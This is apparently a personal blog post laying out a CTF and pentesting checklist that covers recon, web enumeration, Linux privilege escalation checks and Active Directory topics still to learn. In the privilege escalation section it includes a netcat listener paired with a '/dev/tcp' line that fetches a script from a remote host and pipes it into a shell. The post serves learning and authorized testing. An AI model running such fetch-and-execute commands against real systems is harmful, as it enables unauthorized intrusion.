To create a better workflow during CTFs and pentests, I wanted to build a checklist to bring more consistency to my process. It also gives me insight into the simple things that are easy to overlook. In this post, I’ll walk through the different phases of my checklist and share some of the thoughts behind it.
Initial recon
For most CTFs, initial recon is pretty straightforward: we start with an nmap scan and investigate based on open ports. But in pentesting (especially in black-box scenarios), we often don’t get much to begin with. That’s why I added a few more steps:
- Gather IP ranges
- WHOIS Lookup
- DNS enumeration
- Google dorking
These steps help make sure I don’t miss any publicly available information before diving into the target itself.
Enumerating & Vulnerabilty scanning
In a real pentest, time is limited, so automation becomes important. I’m starting to explore tools like Nessus and OpenVAS for this. But since most of my time goes into CTFs, I’ve been mostly doing manual testing — especially on webapps, which I really enjoy. Here are my go-to web enumeration steps:
- Check for
robots.txtandsitemap.xml - Use Gobuster to find hidden subdirectories
- Use ffuf to brute-force subdomains
- Inspect page source code and JavaScript
- Look for injection points (SQL, XSS, etc.)
- Test upload functions
- Check for log poisoning opportunities
For non-web services (from the nmap scan), I often use HackTricks as a guide to help me enumerate further and understand common attack paths.
Initial access
Once I gain access, things shift — we look for privilege escalation paths. On webapps, this can mean trying to reset credentials or exploit functionality. On Linux, I split my checks into global and user-level steps:
Global checks:
- Kernel version:
uname -a - Sudo rights:
sudo -l - Check for vulnerable
sudoversions - Password reuse across users
- Cronjobs running as root
- World-writable files/scripts
- Run LinPEAS:
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #VictimUser-level checks:
- Check user group memberships
- Look for password reuse
- Check environment variables
- Look for SSH keys
- Check for hidden files
- Check SUID binaries:
find / -perm -4000 -type f 2>/dev/nullTools that keep coming back
Certain tools keep proving their value in almost every challenge or test:
- Burp Suite / ZAP – for web proxying and testing
- Gobuster / ffuf – for brute-force discovery
- Hydra – for login brute-forcing
- LinPEAS – for privilege escalation
- John / Hashcat – for password cracking
Topics I Want to Explore
As I continue to grow, I’ve realized there are still many areas in pentesting I haven’t explored yet. A few that are on my radar:
- Network pentesting
- Security evasion techniques
- Automated vulnerability pipelines
- Social Engineering & phishing
The field is massive — becoming a true all-rounder may not be realistic quickly, but I believe it’s achievable with consistent progress. One step at a time.
A Note on Active Directory (AD)
Right now, my checklist is mostly focused on web and Linux environments, simply because that’s where I’ve gained the most hands-on experience through CTFs and internal tests. But Active Directory is a huge part of real-world pentesting, especially in internal assessments. So even though I don’t have a full workflow for AD yet, it’s an area I’m actively planning to dive into.
Some key topics I want to explore in this space:
- Basic AD enumeration (users, groups, shares)
- Kerberos attacks (e.g. Kerberoasting, AS-REP roasting)
- Pass-the-Hash / Pass-the-Ticket
- BloodHound & SharpHound analysis
- Abuse of misconfigured ACLs
I’ll update this post and my GitBook once I’ve built a more complete checklist and gained real practice with these.
Whats next?
I know many of these items are basic — and that’s exactly the point. Basics get skipped more often than you’d think. Missing them can mean missing the entire attack path. I’ll be sharing my checklist soon, probably in the form of a GitBook or similar platform. I’m also working on collecting my CEH and other study notes in the same place. It’s a work in progress, but I hope it will help others too. The checklist will grow over time as my experience does. This post is just a snapshot of where I’m at now — and that’s perfectly fine.